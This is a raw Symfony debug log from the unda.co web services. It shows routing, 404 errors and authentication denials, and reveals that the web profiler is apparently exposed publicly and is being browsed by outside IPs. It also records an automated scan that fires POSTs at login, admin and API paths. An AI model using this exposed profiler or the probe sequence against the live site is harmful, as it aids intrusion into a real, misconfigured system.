  465. [2025-12-16 05:32:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=exception","method":"GET"} []
  466. [2025-12-16 05:32:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  467. [2025-12-16 05:46:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  468. [2025-12-16 05:48:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  469. [2025-12-16 05:55:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=logger","method":"GET"} []
  470. [2025-12-16 05:55:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  471. [2025-12-16 06:10:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET //auth.unda.co/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET //auth.unda.co/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  472. [2025-12-16 06:19:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  473. [2025-12-16 06:19:53] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  474. [2025-12-16 06:20:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
  475. [2025-12-16 06:20:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  476. [2025-12-16 06:39:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  477. [2025-12-16 06:44:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=52.167.144.161&limit=10","method":"GET"} []
  478. [2025-12-16 06:44:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=52.167.144.161&limit=10","method":"GET"} []
  479. [2025-12-16 06:45:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=146.19.24.116&limit=10&method=POST","method":"GET"} []
  480. [2025-12-16 06:45:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=POST","method":"GET"} []
  481. [2025-12-16 06:47:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  482. [2025-12-16 06:47:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  483. [2025-12-16 06:47:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /formaction"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /formaction\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  484. [2025-12-16 06:47:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  485. [2025-12-16 06:47:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/callback"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/callback\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  486. [2025-12-16 06:47:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  487. [2025-12-16 06:47:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  488. [2025-12-16 06:47:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  489. [2025-12-16 06:47:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  490. [2025-12-16 06:47:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dashboard"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dashboard\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  491. [2025-12-16 06:47:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /admin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /admin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  492. [2025-12-16 06:47:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /account"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /account\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  493. [2025-12-16 06:47:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  494. [2025-12-16 06:47:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /settings"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /settings\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  495. [2025-12-16 06:47:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/user"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/user\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  496. [2025-12-16 06:47:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  497. [2025-12-16 06:47:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  498. [2025-12-16 06:47:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /submit"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /submit\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  499. [2025-12-16 06:56:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  500. [2025-12-16 06:58:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  501. [2025-12-16 06:58:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  502. [2025-12-16 06:58:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  503. [2025-12-16 06:58:04] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  504. [2025-12-16 06:58:04] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  505. [2025-12-16 06:58:04] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  506. [2025-12-16 06:58:04] security.DEBUG: Calling Authentication entry point. [] []
  507. [2025-12-16 06:58:37] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  508. [2025-12-16 06:59:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  509. [2025-12-16 06:59:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  510. [2025-12-16 06:59:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  511. [2025-12-16 06:59:05] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  512. [2025-12-16 06:59:05] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  513. [2025-12-16 06:59:05] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  514. [2025-12-16 06:59:05] security.DEBUG: Calling Authentication entry point. [] []
  515. [2025-12-16 07:10:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  516. [2025-12-16 07:10:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=db","method":"GET"} []
  517. [2025-12-16 07:10:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  518. [2025-12-16 07:10:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  519. [2025-12-16 07:10:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  520. [2025-12-16 07:10:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  521. [2025-12-16 07:10:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  522. [2025-12-16 07:10:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  523. [2025-12-16 07:10:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  524. [2025-12-16 07:10:30] security.DEBUG: Calling Authentication entry point. [] []
  525. [2025-12-16 07:11:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  526. [2025-12-16 07:11:26] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  527. [2025-12-16 07:11:26] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  528. [2025-12-16 07:11:26] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  529. [2025-12-16 07:11:27] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  530. [2025-12-16 07:11:27] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  531. [2025-12-16 07:11:27] security.DEBUG: Calling Authentication entry point. [] []
  532. [2025-12-16 07:21:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02d2e2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/02d2e2?panel=validator","method":"GET"} []
  533. [2025-12-16 07:21:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  534. [2025-12-16 07:31:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
  535. [2025-12-16 07:31:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=85.208.48.154&limit=10&method=GET","method":"GET"} []
  536. [2025-12-16 07:37:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f8d329","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f8d329?panel=request","method":"GET"} []
  537. [2025-12-16 07:37:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  538. [2025-12-16 07:51:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  539. [2025-12-16 07:55:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"259531","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/259531?panel=logger","method":"GET"} []
  540. [2025-12-16 07:55:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  541. [2025-12-16 07:57:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42ca9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a42ca9?panel=dump","method":"GET"} []
  542. [2025-12-16 07:57:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  543. [2025-12-16 07:59:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a238bb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a238bb?panel=router","method":"GET"} []
  544. [2025-12-16 07:59:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  545. [2025-12-16 08:00:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=cache","method":"GET"} []
  546. [2025-12-16 08:00:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  547. [2025-12-16 08:34:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e1311c","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/e1311c?panel=time","method":"GET"} []
  548. [2025-12-16 08:34:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  549. [2025-12-16 08:35:32] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  550. [2025-12-16 08:35:32] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  551. [2025-12-16 08:35:32] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  552. [2025-12-16 08:35:32] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  553. [2025-12-16 08:35:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  554. [2025-12-16 08:35:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  555. [2025-12-16 08:35:32] security.DEBUG: Calling Authentication entry point. [] []
  556. [2025-12-16 08:35:33] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
